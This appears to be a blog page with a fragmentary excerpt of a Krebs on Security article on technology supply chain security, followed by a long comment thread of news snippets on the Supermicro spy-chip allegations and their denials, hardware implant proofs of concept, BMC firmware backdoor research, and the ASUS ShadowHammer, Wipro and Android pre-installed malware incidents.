Supply Chain Security is the Whole Enchilada, But Who’s Willing to Pay for It? — Krebs on Security

You can have it fast, cheap, or secure — pick any two.

It seems to be possible as long as “secure” isn’t one of your choices.

“Our IT industry is inexorably international, and anyone involved in the process can subvert the security of the end product,” Schneier wrote.
We don’t often hear about intentional efforts to subvert the security of the technology supply chain simply because these incidents tend to get quickly classified by the military when they are discovered.
Indeed, noted security expert Bruce Schneier calls supply-chain security “an insurmountably hard problem.”

Most of the U.S. government’s efforts to police the global technology supply chain seem to be focused on preventing counterfeits — not finding secretly added spying components.

Finally, it’s not clear that private industry is up to the job, either. At least not yet.

Supply chain challenges definitely fit into categorythings I can’t change“.


  1. Tomi Engdahl says:

    Joseph Bernstein / BuzzFeed News:
    Amazon canceled some ads on Bloomberg’s properties, sources say due to China spy chips story; sources: Apple did not invite Bloomberg to fall product event — Amazon pulled its fourth quarter advertisements on Bloomberg’s website, a move some within the media giant think is retribution …

    Amazon Has Pulled Its Ads From Bloomberg Over China Hack Story

    Sources say both Amazon and Apple are taking retributive measures against the outlet that alleged they were hacked by China.

  2. Tomi Engdahl says:

    Building a Proof of Concept Hardware Implant

    [Nicolas Oberli] of Kudelski Security wanted to do more than idly speculate, so he decided to come up with a model of how an implanted hardware espionage device could interact with the host system. He was able to do this with off the shelf hardware, meaning anyone who’s so inclined can recreate this “Hardware Implant Playset” in their own home lab for experimentation. Obviously this is not meant to portray a practical attack in terms of the hardware itself, but gives some valuable insight into how such a device might function.

    Build Your Own Hardware Implant

  3. Tomi Engdahl says:

    IFTLE 397: Malicious Embedded Chips? And TSMC Rides the Leading Edge

    Malicious Embedded Chips in our Mother Boards?

    Early October brought a report from Bloomberg that I have heard was the top tech story circulating at the DoD and DARPA.

    For years, articles about counterfeit chips, and our reliance on Asian-made chips – where they could be modified in ways to pass on information or allow hacks – have worried us. Now…. we’ve got something new to worry about.

    The 3rd party discovered that the servers customers installed in AWS’ networks to handle the video compression were assembled by Super Micro Computer, a San Jose CA company that also supplied the server motherboards. Nested on the servers’ motherboards, the testers found a tiny microchip, that wasn’t part of the boards’ original design.

    Amazon reported the discovery to U.S. authorities. Elemental’s servers were found in Department of Defense data centers, the CIA’s drone operations, and the onboard networks of Navy warships. Investigators reportedly determined that the chips allowed the attackers to create a stealth doorway into any network that included the altered machines.

    Elemental was just one of the hundreds of Super Micro customers

    The FBI and the Office of the Director of National Intelligence, representing the CIA and NSA, declined to comment. While Apple and Amazon denied the Bloomberg report [link] Bloomberg defended its reporting, indicating that “…the companies’ denials are countered by six current and former senior national security officials, who in conversations that began during the Obama administration and continued under the Trump administration—detailed the discovery of the chips and the government’s investigation.

    One of those officials and two people inside AWS provided extensive information on how the attack played out at Elemental and Amazon; the official and one of the insiders also described Amazon’s cooperation with the government investigation. In addition to the three Apple insiders, four of the six U.S. officials confirmed that Apple was a victim. In all, 17 people confirmed the manipulation of Supermicro’s hardware and other elements of the attacks. The sources were granted anonymity because of the sensitive, and classified, nature of the information.”

    Certainly, if nothing else, these reports have opened eyes to the issue of not having the capability for packaging and assembly in the US for consumer products, as well as DoD applications.

  4. Tomi Engdahl says:

    Hardware Cyberattacks: How Worried Should You Be?—threats/hardware-cyberattacks-how-worried-should-you-be/d/d-id/1333167

    How to fit hardware threats into your security model as hardware becomes smaller, faster, cheaper, and more complex.

  5. Tomi Engdahl says:

    Supply-chain attack on cryptocurrency exchange

    Latest ESET research shows just how far attackers will go in order to steal bitcoin from customers of one specific virtual currency exchange

    On November 3, attackers successfully breached StatCounter, a leading web analytics platform. This service is used by many webmasters to gather statistics on their visitors – a service very similar to Google Analytics.

    by compromising the StatCounter platform, attackers can inject JavaScript code in all websites that use StatCounter.

    Attackers modified the script at by adding a piece of malicious code

  6. Tomi Engdahl says:

    Microsoft Finds Pirated Windows on Too Many New Computers
    Company also discovers malware and coin miners on these PCs

    Microsoft has conducted its own investigation on the Asian new PC market, only to discover an insane number of computers sold with a pirated Windows license.

    As reported by The Economic Times, Microsoft purchased PCs between May and July from Asian markets in an attempt to determine how many of them are shipped with counterfeit Windows licenses and malware pre-installed.

  7. Tomi Engdahl says:

    DUST Identity Emerges From Stealth to Protect Device Supply Chain

    Boston, MA-based start-up firm DUST Identity has emerged from stealth with $2.3 million seed funding led by Kleiner Perkins, with participation from New Science Ventures, Angular Ventures, and Castle Island Ventures. It was founded in 2018 by Ophir Gaathon (CEO), Jonathan Hodges (VP engineering) and Dirk Englund (board member).

    DUST, an anagram for ‘diamond unclonable security tag’, has developed a method to ensure the provenance and integrity of any object. Its purpose is to protect the physical supply chain from manufacture to installation, and during continued use. In essence, a very tiny spray of diamond particles is applied to any surface. The pattern created is random but unique to each object. This is scanned and recorded, and becomes the object’s fingerprint. Any physical attempt to tamper with the object disturbs the fingerprint and becomes known.

    The spray pattern is random by design. DUST takes the view that if it could predefine a pattern, then an adversary would be able to copy it. Instead it allows the vagaries of nature and the environment to create an unclonable unique pattern.

  8. Tomi Engdahl says:

    Security agencies warn of foreign espionage threat to company networks
    RCMP warns of of ‘supply chain vulnerability’ — a back-door tactic to infiltrate systems

    Canadian companies should watch out when they use technology supplied by state-owned companies from countries that want to steal corporate secrets, the country’s security agencies have warned.

    The RCMP organized two workshops last March — one in Calgary, the other in Toronto — to raise awareness about threats to critical systems, including espionage and foreign interference, cyberattacks, terrorism and sabotage, newly disclosed documents show.

  9. Tomi Engdahl says:

    Super Micro Finds No Malicious Hardware in Motherboards

    Company examined equipment following allegations of a rogue chip

    Super Micro Computer Inc. told its customers in a letter Tuesday that a third-party firm didn’t find malicious hardware on its equipment, as the supplier of motherboards continued to dispute a report that its products had been sabotaged.

    “After thorough examination and a range of functional tests, the investigations firm found absolutely no evidence of malicious hardware on our motherboards,”

  10. Tomi Engdahl says:

    Supermicro Says It Found No Evidence of Malicious Chips

    Supermicro has faced allegations for months that some server motherboards it sold contained malicious chips that opened a backdoor into the data centers of major technology companies, including Apple and Amazon.

    The company came under scrutiny earlier this year after a Bloomberg report claimed that some Supermicro motherboards were carrying covert implants inserted in factories operated by the company’s Chinese contractors. Supermicro said that the firm it hired had found no evidence of malicious chips in a representative sample of its motherboards,

  11. Tomi Engdahl says:


  12. Tomi Engdahl says:

    Dan Goodin / Ars Technica:
    Researchers find that weaknesses in Supermicro hardware would let an attacker leave a persistent and hidden backdoor on IBM’s cloud “bare-metal” servers — Other providers of bare-metal cloud computing might also be vulnerable to BMC hack. — More than five years …

    Supermicro hardware weaknesses let researchers backdoor an IBM cloud server
    Other providers of bare-metal cloud computing might also be vulnerable to BMC hack.

    More than five years have passed since researchers warned of the serious security risks that a widely used administrative tool poses to servers used for some of the most sensitive and mission-critical computing. Now, new research shows how baseboard management controllers, as the embedded hardware is called, threaten premium cloud services from IBM and possibly other providers.

  13. Tomi Engdahl says:

    Hackers Backdoor Cloud Servers to Attack Future Customers

    A new vulnerability dubbed Cloudborne can allow attackers to implant backdoor implants in the firmware or BMC of bare metal servers that survive client reassignment in bare metal and general cloud services, leading to a variety of attack scenarios.

    Organizations deploying critical high-value apps on bare metal servers through Infrastructure as a Service (IaaS) offerings consider it the best alternative to buying their own hardware because this allows for easy and quick scaling of cloud-based applications without the need of sharing the hardware with other users.

    While this generally means that an organization’s critical apps are always running on dedicated servers, the fact that those servers are reclaimed and re-assigned once the client no longer needs them exposes them to firmware weaknesses and vulnerabilities that can persist between customer assignments.

    Even though IBM and Eclypsium are already engaged in talks regarding the severity level of this vulnerability, other cloud vendors have yet to chime in into a discussion that could be going for a while considering the implications of such security issues on the long term and the apparently extremely hard to implement fixes.

  14. Tomi Engdahl says:

    Hackers Can Plant Backdoors on Bare Metal Cloud Servers: Researchers

    Malicious actors could plant firmware backdoors on bare metal cloud servers and use them to disrupt applications, steal data, and launch ransomware attacks, firmware security company Eclypsium warned on Tuesday.

  15. Tomi Engdahl says:

    Supermicro Servers Can Be Easily Backdoored After All,38697.html

    Last year, Bloomberg ran a report, saying Supermicro-supplied servers come with Chinese backdoors and that this may have been a reason for Apple to dropped them in 2016; although Apple denied espionage concerns at the time. Although new research publsihed today doesn’t exactly confirm Bloomberg’s report that Supermicro servers ship with pre-installed backdoors, it does point to the microcontrollers used by Supermicro and the firmware that comes with them being easily backdoored without detection.

    Supermicro’s “Parasitic Servers” Are Easily Exploitable
    Previous research had shown that baseboard management controllers (BMCs), which are motherboard-attached microcontrollers, can give extraordinary remote access to servers inside data centers. The management capability on these BMCs is provided via the Intelligent Platform Management Interface (IPMI), which in many ways is similar to Intel’s Management Engine and its Active Management Technology and poses the same large risks of allowing attackers to take over servers remotely.

  16. Tomi Engdahl says:

    Warning: ASUS Software Update Server Hacked to Distribute Malware

    CCleaner hack was one of the largest supply chain attacks that infected more than 2.3 million users with a backdoored version of the software in September 2017.

    Security researchers today revealed another massive supply chain attack that compromised over 1 million computers manufactured by Taiwan-based tech giant ASUS.

    A group of state-sponsored hackers last year managed to hijack ASUS Live automatic software update server between June and November 2018 and pushed malicious updates to install backdoors on over one million Windows computers worldwide.

  17. Tomi Engdahl says:

    ShadowHammer: Malicious updates for ASUS laptops

    Asus unwittingly pushed malware to 500k laptops after hack

  18. Tomi Engdahl says:

    Spyware sneaks into ‘million-ish’ Asus PCs via poisoned software updates, says Kaspersky
    Hackers were interested in 600 or so targets, it is claimed

    ASUS Live Update Infected with Backdoor in Supply Chain Attack

    A new advanced persistent threat (APT) campaign detected by Kaspersky Lab in January 2019 and estimated to have run between June and November 2018 has allegedly impacted over one million users who have downloaded the ASUS Live Update Utility on their computers.

    Kaspersky Lab’s Global Research and Analysis (GReAT) team named this malicious campaign Operation ShadowHammer and, as initially reported by Kim Zetter, it is supposed to have led to the backdoored version of ASUS Live Update being downloaded and installed by more than 57,000 Kaspersky users.

  19. Tomi Engdahl says:

    Some ASUS Updates Drop Backdoors on PCs in ‘Operation ShadowHammer’

    The attack appears to be associated with a China-backed APT actor.

    A supply-chain attack dubbed “Operation ShadowHammer” has been uncovered, targeting users of the ASUS Live Update Utility with a backdoor injection. The China-backed BARIUM APT is suspected to be at the helm of the project.

  20. Tomi Engdahl says:

    Wipro hacked, used as a springboard for more attacks

    Phishing attacks attempted against Wipro’s clients.

    Wipro, one of India’s largest IT outsourcing and consulting companies, has been used as a weapon against its own customers, security researchers are saying.

    Apparently an unknown, possibly state-sponsored attacker, has breached Wipro’s networks months ago, and then used it to conduct phishing attacks against Wipro’s clients.

  21. Tomi Engdahl says:

    Wipro Intruders Targeted Other Major IT Firms

    The crooks responsible for launching phishing campaigns that netted dozens of employees and more than 100 computer systems last month at Wipro, India’s third-largest IT outsourcing firm, also appear to have targeted a number of other competing providers, including Infosys and Cognizant, new evidence suggests. The clues so far suggest the work of a fairly experienced crime group that is focused on perpetrating gift card fraud.

  22. Tomi Engdahl says:

    Sergiu Gatlan / BleepingComputer:
    Kaspersky researchers say the supply-chain attack that infected ASUS and its PC update tool this year also affected six other companies, mostly in South Korea

    ShadowHammer Targets Multiple Companies, ASUS Just One of Them

    ASUS was not the only company targeted by supply-chain attacks during the ShadowHammer hacking operation as discovered by Kaspersky, with at least six other organizations having been infiltrated by the attackers.

    As further found out by Kaspersky’s security researchers, ASUS’ supply chain was successfully compromised by trojanizing one of the company’s notebook software updaters named ASUS Live Updater which eventually was downloaded and installed on the computers of tens of thousands of customers according to experts’ estimations.

    However, ASUS was not the only company which got its IT infrastructure infiltrated during Operation ShadowHammer given that the researchers were able to find a number of other malware samples that employed similar algorithms and were also signed with valid and legitimate certificates.

    The researchers also stated that “how many more companies are compromised out there is not known. What is known is that ShadowPad succeeded in backdooring developer tools and, one way or another, injected malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism.”

  23. Tomi Engdahl says:

    Analyzing C/C++ Runtime Library Code Tampering in Software Supply Chain Attacks

    For the past few years, the security industry’s very backbone — its key software and server components — has been the subject of numerous attacks through cybercriminals’ various works of compromise and modifications. Such attacks involve the original software’s being compromised via malicious tampering of its source code, its update server, or in some cases, both.

  24. Tomi Engdahl says:

    Tara Seals / Threatpost:
    Flashpoint says April Wipro attack was done by hackers who may have been operating under the radar since ’15, have the hallmarks of an advanced, organized group

    Wipro Attackers Have Operated Under the Radar for Years

    The adversaries have the hallmarks of an advanced, organized group, with well-established infrastructure.

    New details are emerging in the April attack on systems consulting behemoth Wipro, which saw its network hacked and used for mounting attacks on a dozen of its customers. In a fresh analysis of the indicators of compromise (IOCs), Flashpoint analysts said that the cyberattackers have actually been operating in the shadows for some time – and that the Wipro incident is only its latest effort.

  25. Tomi Engdahl says:

    Wipro Threat Actors Active Since 2015

    As more layers of the Wipro breach are peeled away, new intelligence about the actors behind the attack on one of India’s largest IT outsourcing and consulting organizations has emerged. Evidence uncovered by Flashpoint researchers links the threat actors to other malicious activity dating back to 2017, and possibly 2015, as well as the re-use of infrastructure from those older attacks.

    Also, many legitimate security applications were abused during this campaign. For example, the phishing templates used to ensnare victims inside Wipro match those provided by a security awareness training provider. The attackers also dropped ScreenConnect on the machines it compromised inside Wipro, and some of the domains used in the attack were hosting powerkatz and powersploit scripts.

  26. Tomi Engdahl says:


    A software supply chain attack represents one of the most insidious forms of hacking. By breaking into a developer’s network and hiding malicious code within apps and software updates that users trust, supply chain hijackers can smuggle their malware onto hundreds of thousands—or millions—of computers in a single operation, without the slightest sign of foul play. Now what appears to be a single group of hackers has managed that trick repeatedly, going on a devastating supply chain hacking spree—and becoming more advanced and stealthy as they go.

  27. Tomi Engdahl says:

    They’re known as Barium, or sometimes ShadowHammer, ShadowPad, or Wicked Panda, depending on which security firm you ask.

  28. Tomi Engdahl says:

    A Mysterious Hacker Group Is On a Supply Chain Hijacking Spree

    A software supply chain attack represents one of the most insidious forms of hacking. By breaking into a developer’s network and hiding malicious code within apps and software updates that users trust, supply chain hijackers can smuggle their malware onto hundreds of thousands—or millions—of computers in a single operation, without the slightest sign of foul play. Now what appears to be a single group of hackers has managed that trick repeatedly, going on a devastating supply chain hacking spree—and becoming more advanced and stealthy as they go.

  29. Tomi Engdahl says:

    Data Sharing And Digital Threads

    Share product information with members of the supply chain without exposing your data.

    The benefits of digital threads
    A digital thread tracks the genealogy and data of a product—from each component right through to the end-product. Given their significant benefits, it is only a matter of time before digital threads become standard operating procedure in manufacturing supply chains. This will bring many benefits:

    Lower RMA costs: Through board-to-chip correlations, faster root cause analysis, running online RMA prevention rules, reducing No-Trouble-Found (NTF) rates and, in the worst case, implementing highly targeted recalls.
    Improved quality and time-to-quality: By reducing time to reach acceptable Defective-Parts-Per-Million (DPPM) goals for new products, creating an online quality link between chips and boards, and using advanced failure prediction techniques such as escape prevention and outlier detection.
    More efficient test processes: Via adaptive testing that uses component data to test “suspect” parts more and “perfect” parts less.
    Better system performance: By avoiding in-spec chips with marginal performance and pairing the right chips with the right board.

    But digital threads require data sharing
    The fundamental principle of a digital thread is that data is shared—inside the organization and with every company along the supply chain. For electronics manufacturers, that could mean data from each component’s fabrication and test phases, through assembly, inspection and rework and finally to usage data from the field.

    A data sharing hub
    The data sharing hub is a trusted entity that facilitates Machine Learning and analytics while hiding the “raw” data from the other members of the supply chain. It is only the insights derived from the data that are shared among the different parties. In the meantime, the hub has the visibility across the entire supply chain that is required to track down where issues stem from—issues that otherwise may have not been discovered until the very end of the supply chain.

  30. Tomi Engdahl says:

    Hackers Exploit ASUS Update Process to Install Backdoor

    The BlackTech cyber-espionage group has been performing man-in-the-middle (MitM) attacks on the update process of the ASUS WebStorage application to deliver the Plead backdoor to their targeted victims, ESET reports.

  31. Tomi Engdahl says:

    Can The Hardware Supply Chain Remain Secure?

    The growing number of threats are cause for concern, but is it really possible to slip malicious code into a chip?

  32. Tomi Engdahl says:

    Google Confirms Android Smartphone Security Backdoor

    Earlier this year, Forbes reported how a banking Trojan called Triada had been found on a bunch of brand new budget Android smartphones. Google has now confirmed that threat actors did, indeed, manage to compromise Android smartphones with the installation of a backdoor as part of a supply chain attack.

  33. Tomi Engdahl says:

    Brian Krebs / Krebs on Security:
    A deep dive on which vendor may be responsible for a supply chain attack that Google said resulted in pre-installed malware on budget Android devices — Earlier this month, Google disclosed that a supply chain attack by one of its vendors resulted in malicious software being pre-installed on millions of new budget Android devices.

    Tracing the Supply Chain Attack on Android

    Earlier this month, Google disclosed that a supply chain attack by one of its vendors resulted in malicious software being pre-installed on millions of new budget Android devices. Google didn’t exactly name those responsible, but said it believes the offending vendor uses the nicknames “Yehuo” or “Blazefire.” What follows is a deep dive into the identity of that Chinese vendor, which appears to have a long and storied history of pushing the envelope on mobile malware.

    The Shanghai Blazefire Network is part of a group of similarly-named Chinese entities in the “mobile phone pre-installation business and in marketing for advertisers’ products to install services through mobile phone installed software.”

    “At present, pre-installed partners cover the entire mobile phone industry chain, including mobile phone chip manufacturers, mobile phone design companies, mobile phone brand manufacturers, mobile phone agents, mobile terminal stores and major e-commerce platforms,” reads a descriptive blurb about the company.

    That particular help wanted ad was for a “client software development” role at Tongjue. The ad said the ideal candidate for the position would have experience with “Windows Trojan, Virus or Game Plug-ins.” Among the responsibilities for this position were:

    -Crack the restrictions imposed by the manufacturer on the mobile phone.
    -Research and master the android [operating] system
    -Reverse the root software to study the root of the android mobile phone
    -Research the anti-brushing and provide anti-reverse brushing scheme

  34. Tomi Engdahl says:

    How data-driven insurance can secure supply chain resilience

    Supply chain networks are more exposed to external disruptions than ever before. Next to cyber-attacks, adverse weather conditions are one of the biggest threats business operations can face, causing billions of losses. However, most compagnies are not well-prepared for natural or man-made disasters

  35. Tomi Engdahl says:

    This proof-of-concept suggests that supply chain attacks may not be as expensive or difficult as many of us previously thought.

    Proof-of-Concept Spy Chips?

    Back at the tail end of last year Bloomberg published a piece called “The Big Hack,” claiming that a supply chain attack originating in China had affected almost 30 companies, including Apple, Amazon, and Super Micro. The story was immediately, and vehemently, denied by pretty much everyone

    Although nobody could find any evidence to suggest ‘The Big Hack’ was really happening, nobody denies that the idea of a supply chain hack is possible. In fact, it’s pretty much the worst possible nightmare scenario when it comes to security, because there’s no way to fix things other than to burn everything to the ground and start again. Which isn’t going to help for most people.

    However, while most of us argued that a supply chain attack was possible, we also argued that it was unlikely to happen in real life because of the difficulty involved in actually carrying it out.

    But at the CS3sthlm security conference, which will be held later this month in Stockholm, Sweden, security researcher Monta Elkins, the “Hacker-in-Chief” for FoxGuard Solutions, will present a proof-of-concept attack that can be implemented on a budget of under two hundred dollars and carried out on your lab bench at home.

  36. Tomi Engdahl says:

    An infographic about supply chain risk with a bunch of data points.

    It’s here
    ( – thank you!

  37. Tomi Engdahl says:

    35C3 – Modchips of the State

    Hardware implants and supply chain attacks have been in the news recently, but how feasible are they and what can we do about them? In this talk we’ll examine the design of a proof of concept SPI bus hardware implant that has similar capabilities to those described in the Bloomberg/Supermicro article as well as some countermeasures that we can use to try to detect these “modchips” and increase our trust in our systems

  38. Tomi Engdahl says:

    Security Risks In The Supply Chain
    Trojans, a dual supply chain and industry consolidation are creating new threats for chipmakers.


Leave a Comment

Your email address will not be published. Required fields are marked *